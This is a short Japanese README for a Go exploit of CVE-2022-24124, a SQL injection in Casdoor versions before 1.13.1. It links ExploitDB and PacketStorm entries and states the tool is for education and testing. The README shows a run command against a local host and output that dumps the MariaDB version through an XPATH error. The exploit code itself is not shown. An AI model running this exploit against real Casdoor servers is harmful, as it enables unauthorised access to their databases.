
Casdoor < 1.13.1 を実行しているホスト上の SQL データベースのバージョンをダンプする
CVE-2022-24124 のエクスプロイトコード、別名 Casdoor SQL Injection
エクスプロイトリンク: [ExploitDB-50792] [PacketStormSecurity]
期待される結果: Casdoor < 1.13.1 を実行しているホスト上のSQLデータベースバージョンをダンプする
教育目的および企業環境でのテストのみを対象としています。
Barricade➜ go run exploit.go -u http://127.0.0.1:8080
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)
[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1